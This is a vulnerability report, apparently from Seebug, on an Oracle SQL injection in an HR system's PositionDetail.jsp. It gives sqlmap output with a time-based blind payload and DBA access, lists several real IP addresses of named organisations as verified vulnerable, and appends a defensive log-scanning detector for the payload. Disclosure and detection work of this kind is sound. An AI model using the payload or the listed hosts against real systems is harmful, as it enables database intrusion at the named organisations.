### Brief description:
-----------------------------------
Say something

### Detailed description:

[![472F3300-37DA-4FDD-AAF3-E36E8A5A52F7.png](https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png)](https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png)

[![7DD296A6-915C-4763-9C00-E0110C272A7E.png](https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png)](https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png)

```
The PK_EMPTY_JOB parameter of /hrss/rm/PositionDetail.jsp is vulnerable to SQL injection.
```

Just throw it into sqlmap:

```
http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA&

GET parameter 'PK_EMPTY_JOB' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 114 HTTP(s) requests:
---
Place: GET
Parameter: PK_EMPTY_JOB
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: PK_EMPTY_JOB=1001A11000000000G9WA') AND 3750=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(119)||CHR(83)||CHR(84),5) AND ('nlJx'='nlJx&
---
[16:32:22] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[16:32:22] [INFO] fetched data logged to text files under '/Users/loli/sqlmap/output/219.140.193.253'
```

```
current user is DBA: True
```

[![YONGYOU1.png](https://images.seebug.org/upload/201407/09164325c42ab514edcb091ad718451b5cc638de.png)](https://images.seebug.org/upload/201407/09164325c42ab514edcb091ad718451b5cc638de.png)

### Proof of vulnerability:

A few URLs (verified):

```
http://59.173.0.46:8090/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA&
中冶集团武汉勘察研究院有限公司
http://120.40.72.157:4001/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001V110000000000O0W&
福建省石油化学工业设计院
```
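The sqlmap output above shows what this injection looks like on the wire: a closed quote and parenthesis, a call to DBMS_PIPE.RECEIVE_MESSAGE with a sleep argument, CHR()-concatenated strings, and a closing tautology. As an added example that is not part of the original report, the Python below turns those traits into a detector for web access logs: it URL-decodes every query parameter and flags values carrying the Oracle time-based blind pattern, reporting the requested delay. The Apache-style log lines and the 203.0.113.x client addresses are constructed for the example (the only payload is the one quoted in the report); the log format and field names are assumptions, not anything the affected product emits.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Signatures of an Oracle time-based blind injection as seen in the report's payload.
ORACLE_TIME_BLIND = re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I)
CHR_CONCAT = re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)
# "AND ('x'='x" style tail that re-balances the original query.
TAUTOLOGY = re.compile(r"\bAND\s*\(?\s*'([^']*)'\s*=\s*'\1", re.I)
# Second argument of RECEIVE_MESSAGE is the sleep time in seconds.
RECEIVE_DELAY = re.compile(r"RECEIVE_MESSAGE\s*\(.*?,\s*(\d+)\s*\)", re.I | re.S)

# Assumed Apache combined-style request line: client, ident, user, [time], "METHOD target PROTO" status
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (placeholder hosts); line 2 carries the payload from the report, URL-encoded.
SAMPLE_LOG = """\
203.0.113.10 - - [09/Jul/2014:16:32:22 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& HTTP/1.1" 200 5120
203.0.113.10 - - [09/Jul/2014:16:32:23 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA%27%29%20AND%203750%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28108%29%7C%7CCHR%28119%29%7C%7CCHR%2883%29%7C%7CCHR%2884%29%2C5%29%20AND%20%28%27nlJx%27%3D%27nlJx& HTTP/1.1" 200 5120
203.0.113.11 - - [09/Jul/2014:16:35:01 +0800] "GET /hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001V110000000000O0W& HTTP/1.1" 200 4980
"""


def decoded_params(target):
    """Return {name: [decoded values]} for the query string of a request target."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def classify_value(value):
    """List the injection traits present in one decoded parameter value (empty if benign)."""
    reasons = []
    if ORACLE_TIME_BLIND.search(value):
        reasons.append("oracle_time_based_blind")
    if CHR_CONCAT.search(value):
        reasons.append("chr_concat_string")
    if TAUTOLOGY.search(value):
        reasons.append("closing_tautology")
    return reasons


def delay_seconds(value):
    """Sleep time requested via DBMS_PIPE.RECEIVE_MESSAGE, or None if absent."""
    m = RECEIVE_DELAY.search(value)
    return int(m.group(1)) if m else None


def scan_access_log(text):
    """Scan access-log text and return one finding per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        for name, values in decoded_params(m["target"]).items():
            for value in values:
                reasons = classify_value(value)
                if reasons:
                    findings.append({
                        "client": m["client"],
                        "time": m["time"],
                        "param": name,
                        "reasons": reasons,
                        "delay_seconds": delay_seconds(value),
                    })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Decoding before matching matters: the signatures are invisible in the raw request line because the quotes, parentheses and `||` arrive percent-encoded. Pairing a hit with a slow response time for the same request (the requested delay is 5 seconds here) confirms that the time-based probe actually reached the database, which is the strongest signal that the parameter is still concatenated into a query rather than bound.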